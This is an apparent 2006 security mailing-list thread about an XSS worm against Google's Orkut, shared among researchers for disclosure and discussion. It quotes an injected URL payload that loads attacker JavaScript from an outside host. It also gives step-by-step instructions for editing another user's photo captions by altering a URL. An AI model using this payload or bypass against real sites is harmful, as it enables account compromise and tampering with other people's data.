RES: [WEB SECURITY] XSS worm attacking Google?

Denny Roger denny at batori.com.br
Sun Dec 10 05:14:35 EST 2006 

Brazilian specialists in security application discover some vulnerabilities
in the Orkut. In Brazil, the Orkut is very popular.
 
Vulnerability allows to modify legends of photos of the Orkut.
(
<http://idgnow.uol.com.br/seguranca/2006/01/17/idgnoticia.2006-02-06.6899894
936/IDGNoticia_view>
http://idgnow.uol.com.br/seguranca/2006/01/17/idgnoticia.2006-02-06.68998949
36/IDGNoticia_view)
Users can modify the credits in albums of photos of any integrant of the
virtual community of the Google. 
 
1 - It makes login in the Orkut and visits the photo album of its “victim”.
I will choose the photo that it desires to edit the legend and click in
“seeing photo entire”. 
 
2 - It looks at the address of the page in the “bar of addresses” (that
place where you place the address of the site that you want to go). In this
example, the address of the “entire photo” in the album is: 
 
 <http://www.orkut.com/AlbumZoom.aspx?uid=9803017927649916035&pid=10>
http://www.orkut.com/AlbumZoom.aspx?uid=9803017927649916035&pid=10
 
3 - It changes the word “AlbumZoom” for “AlbumEdit”. 
 
 <http://www.orkut.com/AlbumEdit.aspx?uid=9803017927649916035&pid=10>
http://www.orkut.com/AlbumEdit.aspx?uid=9803017927649916035&pid=10 
 
It presses ENTER and
 Soon! You are in the edition page of the photo.
 
Another news:
 
Worm arrives at the camouflaged PC as message of scrap of the Orkut 
(
<http://idgnow.uol.com.br/seguranca/2006/05/30/idgnoticia.2006-05-30.5912736
251/IDGNoticia_view>
http://idgnow.uol.com.br/seguranca/2006/05/30/idgnoticia.2006-05-30.59127362
51/IDGNoticia_view)
Profiles of the service had been white of false messages that directed the
user for an archive “.exe” that, after installed, it stole personal data of
the user. 
 
These are some examples. Exist many cases registered in Brazil.
 
All the discovered vulnerabilities, are  corrected. 
 
Regards,
 
Denny Roger
Batori Software & Security
www.batori.com.br <http://www.batori.com.br/>   
+55 (11) 5084.0071
 
Fundada em 1997, a Batori Software & Security é reconhecida por ser uma
empresa altamente especializada em Segurança da Informação.  
As boas práticas de segurança implementadas nos projetos desenvolvidos pela
Batori Software & Security, permitiram a criação da metodologia proprietária
BSM, em conformidade com a ISO 17799 e ISO 15408.
 
Nossa equipe desenvolve, mantém, e disponibiliza sem custos, uma coleção de
documentos de pesquisa sobre vários aspectos de Segurança da Informação.
 


  _____  

De: Kuai Hinojosa [mailto:kuai.hinojosa at gmail.com] 
Enviada em: domingo, 10 de dezembro de 2006 02:04
Para: pdp (architect)
Cc: Billy Hoffman; Web Security
Assunto: Re: [WEB SECURITY] XSS worm attacking Google?


That is not spanish that is portuguese.  Thanks for sharing this information
Billy.


On 12/9/06, pdp (architect) <  <mailto:pdp.gnucitizen at googlemail.com>
pdp.gnucitizen at googlemail.com> wrote: 

Nice find. It seams that it is written by someone who speaks Spanish. 
There was a discussion on sla.ckers.org about a vulnerability in orkut
I think... or was that somewhere else. Anyway, it is funny that
attackers came with this worm so quick since that is only a two week 
old finding. It seams that bad guys start realising the power of XSS
worms and their destructive potential. This is not a good news!

On 12/9/06, Billy Hoffman <  <mailto:Billy.Hoffman at spidynamics.com>
Billy.Hoffman at spidynamics.com> wrote:
> Folks,
>
> I was running through some proxy logs, and saw a reference to
> http://sb.google.com/safebrowsing/update
<http://sb.google.com/safebrowsing/update> 
>
> Requesting redirected me to a blacklist of what look like phishing
> sites. However, all the way at the bottom was a reference to Google's
> Orkut site. Specficially the blacklist entry was for a GET-based XSS 
> attack against Google's GLogin system.
>
> https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.as 
> px?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.j
> s\'></script><!--
>
> If you request that URL, you get a 403 error page saying your query is 
> from an automated attack. Looks very similar to a page Google returned
> during the Perl.Santy attack a year or so back.
>
> The JavaScript source code to the attack is still available at
> http://www.probranco.net/xmen.js
>
> Enjoy,
> Billy Hoffman
> --
> Lead Researcher, SPI Labs
> SPI Dynamics Inc. - http://www.spidynamics.com
> Phone:  678-781-4800
> Direct: 678-781-4845
>
>
>
----------------------------------------------------------------------------
> The Web Security Mailing List: 
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>


--
pdp (architect) | petko d. petkov 
http://www.gnucitizen.org

----------------------------------------------------------------------------
The Web Security Mailing List:
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]




-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20061210/d48db63f/attachment.html>

More information about the websecurity mailing list